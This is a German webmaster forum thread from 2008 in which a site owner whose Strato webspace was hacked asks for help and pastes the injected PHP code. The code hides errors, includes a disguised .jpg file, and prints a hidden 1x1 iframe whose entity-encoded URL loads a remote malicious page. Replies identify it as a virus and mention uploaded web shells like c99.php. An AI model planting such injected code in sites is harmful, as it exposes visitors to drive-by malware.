Ergebnis 1 bis 7 von 7

Thema: Hack von Webpace bei Strato

  1. #1
    HTML Newbie
    Registriert seit
    15.05.2008
    Beiträge
    2
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard Hack von Webpace bei Strato

    Vielleicht hat ja jemand schon etwas darüber gehört oder weiß etwas darüber. Beim googlen habe ich nicht wirklich etwas gefunden.

    Am Wochenende, genauer gesagt am 11.05.08 um 19:18 Uhr wurde unser Webspace bei Strato gehackt. In einen Bildordner wurde das 45563131x.jpg abgelegt. Des weiteren wurde in sämtliche index- und config-Dateien der untenstehende Code eingefügt, was zur Folge hatte, dass nur noch ein weißer Hintergrund mit einem 1-px-Bild angezeigt wurde.

    Meine Fragen wären, falls sich jemand damit auskennt: Was könnte man damit bezwecken? Einfach nur aus Spaß einen iframe einfügen und ein bisschen ärgern? Oder könnte dies andere Hintergründe haben? Wenn wir jetzt unsere Passwörter ändern, hat es überhaupt einen Sinn? Wenn der Webspace einmal gehackt wurde, dann kann er das doch immer wieder? Oder könnte möglicherweise der Strato-Server gehackt worden sein?

    Danke schon mal.

    Code:
    <?php 
    	error_reporting&#40;0&#41;;
    	if &#40;file_exists&#40;"/…/…/../../…/htdocs/pics/albums/userpics/10001/45563131x.jpg"&#41;&#41; &#123;
    	include&#40;"/…/…/../../…/htdocs/pics/albums/userpics/10001/45563131x.jpg"&#41;;
    	&#125; else 
    	if &#40;ini_get&#40;"register_globals"&#41;&#41; &#123;
    		if&#40;$GLOBALS&#91;"fx"&#93;==0&#41; &#123; 
    			$GLOBALS&#91;"fx"&#93;=1;
    			echo "<iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>";
    		&#125;
    	&#125; else &#123;
    		echo "<iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>";
    	&#125;
    	?>
    Achtung: Dies ist ein alter Thread im HTML und Webmaster Forum
    Diese Diskussion ist älter als 90 Tage. Die darin enthaltenen Informationen sind möglicherweise nicht mehr aktuell. Erstelle bitte zu deiner Frage ein neues Thema im Forum !!!!!

  2. #2
    Trigger232
    Gast

    Standard

    mmmh also wenn du dein password änderst dann überprüfe auch gleich ob deine e-mail adresse verändert wurde, sonsten können die sich das neue pw immer wieder schicken lassen.

    Ansonsten weiss ich auch nicht welche zwecke sich der "Hacker" dadurch erhofften, was war denn auf dem Bild drauf, Werbung?

  3. #3
    HTML Newbie
    Themenstarter

    Registriert seit
    15.05.2008
    Beiträge
    2
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    Oha! Jetzte sehe ich gerade, nachdem ich den Code hier eingegeben hatte, dass sich aneinandergereite

    &#Zahl;

    in

    src='http://ccfelomvhk.com/dl/adv542.php

    gewandelt hat. (Ich kann die Zahlenfolge hier nicht eingeben, da sie stets in den Link gewandelt wird.)
    Angehängte Grafiken Angehängte Grafiken

  4. #4
    Gastschreiber
    Gast

    Standard Virus

    http://coppermine-galerie.de/forum/viewtopic.php?t=1468

    du hast nen virus auf deinem webserver (in jedem html, php und evtl zip file steckt der wirt, verbreitung bei aufruf....)

  5. #5
    unknownnn
    Gast

    Standard AW: Hack von Webpace bei Strato

    Hallo,
    Wenn du ein Uploadscript gehabt hast, könnten sie dir eine Shell-Datei hochgeladen haben.
    Ich habe meine Webspace auch bei Strato und da hat mir auch einer eine Shell-Datei
    hochgeladen. Zu meinem Glück hat der Hacker die Datei nicht gefunden. Ich habe mal ein bisschen gegoogelt. Es gibt Massen an Websites auf denen Shell-Dateien hochgeladen wurden. Selbst auf Youtube gibt es Videos, die beschreiben wie man mit der Datei umgeht
    und es sind sogar Downloadlinks dabei. Eine der gängigsten Dateien ist die c99.php.
    Ich hoffe ich konnte dir weiterhelfen.

  6. #6
    Bandit
    Gast

    Standard AW: Hack von Webpace bei Strato

    @unknownn
    Glaubst du wirklich, dass das nach 7 Monaten für Abenaa noch interessant ist?

  7. #7
    Forum Guru Avatar von synaptic
    Registriert seit
    20.06.2007
    Ort
    Butzbach-Wiesental
    Beiträge
    10.901
    Danke
    45
    Bekam 48 mal "Danke" in 46 Postings
    Blog-Einträge
    1

    Standard AW: Hack von Webpace bei Strato

    also ich glaube nicht, dass des noch relevant für sie ist, evtl für wen anders, der des gleiche problem hat

    dennoch vorübergehend geschlossen
    KEIN support via pn, email, messenger oder falsch geposteten threads
    Futter für deine Schnuffelzwerge gibts bei den Schnuffelzwergen TOP Qualität, also klicken und kaufen

Ähnliche Themen

  1. Favicon bei Strato?
    Von MrBlueChip im Forum HTML & CSS Forum
    Antworten: 5
    Letzter Beitrag: 07.12.2007, 20:32
  2. Ploneinstallation auf Strato V-rootserver
    Von Lopez16 im Forum Zope & Plone - das deutsche Hilfeforum
    Antworten: 0
    Letzter Beitrag: 13.02.2007, 12:04
  3. Bloß Finger weg von STRATO
    Von Debauchery im Forum Off Topic und Quasselbox
    Antworten: 6
    Letzter Beitrag: 08.10.2006, 03:43
  4. strato
    Von Webby im Forum Webhoster - Provider - (free) Webspace - Server - Domain
    Antworten: 15
    Letzter Beitrag: 13.06.2005, 23:10

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •